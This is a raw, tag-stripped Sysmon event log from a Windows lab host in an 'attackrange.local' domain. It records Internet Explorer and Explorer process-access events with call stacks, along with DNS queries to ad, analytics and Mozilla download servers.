114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.547{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.547{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.519{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.503{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.503{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.499{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.103{59A5CD1D-9410-6005-0E05-00000000A301}6584ad.doubleclick.net0type: 5 dart.l.doubleclick.net;::ffff:216.58.212.134;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.099{59A5CD1D-9410-6005-0E05-00000000A301}6584www.google-analytics.com0type: 5 www-google-analytics.l.google.com;::ffff:216.58.205.238;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:35.434{59A5CD1D-8E56-6005-2E00-00000000A301}2464134.212.58.216.in-addr.arpa.0type: 12 fra16s46-in-f6.1e100.net;type: 12 ams15s21-in-f134.1e100.net;type: 12 ams15s21-in-f6.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:35.434{59A5CD1D-8E56-6005-2E00-00000000A301}2464238.205.58.216.in-addr.arpa.0type: 12 fra15s24-in-f238.1e100.net;type: 12 fra15s24-in-f14.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.233{59A5CD1D-9410-6005-0E05-00000000A301}6584adservice.google.de0type: 5 
pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.168{59A5CD1D-9410-6005-0E05-00000000A301}6584adservice.google.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.037{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.006{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.006{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.006{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+28a83e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+286255(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+28a443(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+29675d(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1971c3(wow64)|C:\Windows\SYSTEM32\urlmon.dll+4f0b8(wow64) 22542200x800000000000000013813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:35.443{59A5CD1D-8E56-6005-2E00-00000000A301}246466.22.217.172.in-addr.arpa.0type: 12 fra15s17-in-f66.1e100.net;type: 12 fra15s17-in-f2.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000013812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:38.255{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:38.255{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.896{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.896{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.896{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.851{59A5CD1D-9410-6005-0E05-00000000A301}6584download-installer.cdn.mozilla.net0type: 5 dn6m9t4qll5h.cloudfront.net;::ffff:13.224.189.56;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.543{59A5CD1D-9410-6005-0E05-00000000A301}6584download.mozilla.org0type: 5 bouncer-bouncer-elb.prod.mozaws.net;::ffff:18.205.79.132;::ffff:100.24.193.114;::ffff:3.94.27.216;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:40.630{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+832f|C:\Windows\SYSTEM32\IEFRAME.dll+e5166|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000013823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:40.630{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+832f|C:\Windows\SYSTEM32\IEFRAME.dll+e5166|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000013822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:40.630{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+832f|C:\Windows\SYSTEM32\IEFRAME.dll+e5166|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 22542200x800000000000000013821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:38.496{59A5CD1D-8E56-6005-2E00-00000000A301}2464132.79.205.18.in-addr.arpa.0type: 12 ec2-18-205-79-132.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 